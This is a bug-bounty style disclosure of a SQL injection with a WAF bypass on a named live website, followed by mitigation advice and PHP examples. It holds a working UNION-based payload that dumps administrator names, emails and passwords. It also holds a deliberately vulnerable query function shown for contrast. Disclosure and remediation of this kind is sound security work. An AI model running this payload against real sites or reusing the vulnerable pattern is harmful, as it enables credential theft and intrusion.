Bug Report

This bug report describes a SQL injection vulnerability found on the website https://longlife.com.pk. The vulnerability can be exploited to bypass the Web Application Firewall (WAF) and retrieve sensitive data such as usernames, emails, and passwords from the backend database. The report provides steps to reproduce the SQLi vulnerability, including using a malicious payload in the URL, and recommends mitigations like prepared statements, input validation, escaping user input, secure database user permissions, and error handling.
BUG REPORT

From : pab412183

Title : SQL Injection Vulnerability with WAF Bypass

Severity : High

Description : This bug report highlights a critical SQL Injection (SQLi)
vulnerability in this website, which can be exploited to bypass the Web
Application Firewall (WAF) and gain unauthorized access to the
database. SQLi attacks can lead to data breaches, unauthorized data
manipulation, and potential system compromise.

WAF Bypass :-

A Web Application Firewall (WAF) is a security tool that sits between a
web application and the internet, filtering out malicious traffic. WAFs are
designed to detect and block common web application attacks, including
SQLi.

However, WAFs can be bypassed by attackers using various techniques,
including encoding, obfuscation, and evasion. For example, an attacker
may use hex encoding to bypass a WAF's signature-based detection.

To prevent WAF bypass, developers should ensure that their WAF rules
are up-to-date and comprehensive. Additionally, they can implement
additional security measures such as rate limiting, IP blocking, and
user-agent filtering.

Vulnerable URL :- https://longlife.com.pk/categories.php?id=2


Payloads :- https://longlife.com.pk/categories.php?id=@2 /*!50000Union*/
Select 1,/*!50000concat*/(name,0x3d,email,0x3d,password),3,4,5,6
/*!50000from*/ administrators--+

[ Copy that full url written in Payloads section and paste it in your
browser to see how critical it is ]

Steps to reproduce :-

1. Open this url in your browser (use firefox/cyberfox to avoid issues):
(https://longlife.com.pk/categories.php?id=2)

2. Then put a single quote (') after the parameter value, like this:
(.php?id=2')

3. You will see a change in your site. Notice that all of your content is
gone. It is not actually gone, it is hidden, because this site contains an
error-based SQLi. You can learn from that embedded link and
from free resources online how it works.

4. Use this payload that I made, which is able to exploit the SQLi on your
website:

(https://longlife.com.pk/categories.php?id=@2 /*!50000Union*/ Select
1,/*!50000concat*/(name,0x3d,email,0x3d,password),3,4,5,6
/*!50000from*/ administrators--+)

5. As you can see, it breaks through the WAF and is able to dump data
from the backend database.

6. You can see that after using that DIOS we dumped username, email and
password. We can also use Burp Suite and other automated tools to
do the same thing, but I did it manually.

Mitigation :

1. Use Prepared Statements (Parameterized Queries):

● Utilize prepared statements or parameterized queries provided by
your programming language or framework. These mechanisms send the
SQL text and the user-supplied values to the database separately, so
an injected value is never parsed as part of the statement.

Example (in PHP using PDO):

[ // the placeholder :username is bound to a value, never concatenated into the SQL
$stmt = $pdo->prepare("SELECT * FROM users WHERE username = :username");
$stmt->bindValue(':username', $username, PDO::PARAM_STR);
$stmt->execute();
$rows = $stmt->fetchAll(PDO::FETCH_ASSOC); ]

2. Input Validation:
● Implement strict input validation on user inputs. Only allow
expected characters and values, and reject anything that doesn't
adhere to your predefined rules.

3. Escape User Input:

● If you cannot use prepared statements for some reason, ensure
that user input is properly escaped before being included in SQL
queries. Use appropriate functions or libraries to escape data,
depending on your programming language and database.

4. Least Privilege Principle:

● Limit the database user's permissions to the minimum necessary
for your application. Avoid using overly privileged accounts.

5. Error Handling:
● Customize error messages so that they don't reveal sensitive
information about the database structure. Display generic error
messages to users and log detailed errors for administrators.
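The five mitigations above applied to a numeric id parameter like the one on categories.php, as an added example that is not code from the original report or the affected site. The table categories (columns id, name), the DSN and the read-only account are assumptions for illustration.

```php
<?php
// Added example, not code from the original report. The table "categories"
// (columns id, name), the DSN and the credentials are assumptions.

// VULNERABLE: the raw query-string value is concatenated into the SQL text,
// so a value like the report's "@2 /*!50000Union*/ ..." is parsed by MySQL
// as part of the statement. Kept only to contrast with the hardened version.
function getCategoryUnsafe(PDO $db, string $rawId): ?array
{
    $sql = "SELECT id, name FROM categories WHERE id = " . $rawId; // injection point
    $row = $db->query($sql)->fetch(PDO::FETCH_ASSOC);
    return is_array($row) ? $row : null;
}

// HARDENED: validate the type, bind the value as a parameter so the server
// never interprets it as SQL, and keep database errors out of the response.
function getCategorySafe(PDO $db, mixed $rawId): ?array
{
    // 1. Input validation: id must be a positive integer, nothing else.
    //    Both "2'" and "@2 /*!50000Union*/ ..." fail this check.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }
    try {
        // 2. Prepared statement: the value travels separately from the SQL text.
        $stmt = $db->prepare('SELECT id, name FROM categories WHERE id = :id');
        $stmt->bindValue(':id', $id, PDO::PARAM_INT);
        $stmt->execute();
        $row = $stmt->fetch(PDO::FETCH_ASSOC);
        return is_array($row) ? $row : null;
    } catch (PDOException $e) {
        // 3. Error handling: details go to the server log, not to the user.
        error_log('categories lookup failed: ' . $e->getMessage());
        return null;
    }
}

// 4. Least privilege: connect as an account that can only SELECT from the
//    tables this page needs (account name and password are placeholders).
$pdo = new PDO('mysql:host=localhost;dbname=shop;charset=utf8mb4', 'app_readonly', 'CHANGE_ME', [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false, // use real server-side prepares
]);
$category = getCategorySafe($pdo, $_GET['id'] ?? '');
if ($category === null) {
    http_response_code(404);
    exit('Category not found'); // generic message, no SQL details
}
echo htmlspecialchars($category['name'], ENT_QUOTES, 'UTF-8');
```

With the integer check in front of the prepared statement, the single quote from step 2 and the versioned-comment payload from step 4 are both rejected before any SQL is built, so the WAF is no longer the only control.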

Remember that SQL injection is just one of many security risks web
applications can face. Implementing a robust security strategy involves
multiple layers of defense, including input validation, secure coding practices,
and ongoing monitoring and testing for vulnerabilities.

POC (proof of concept):-

[Screenshots 1, 2 and 3 are not included in this text extraction]
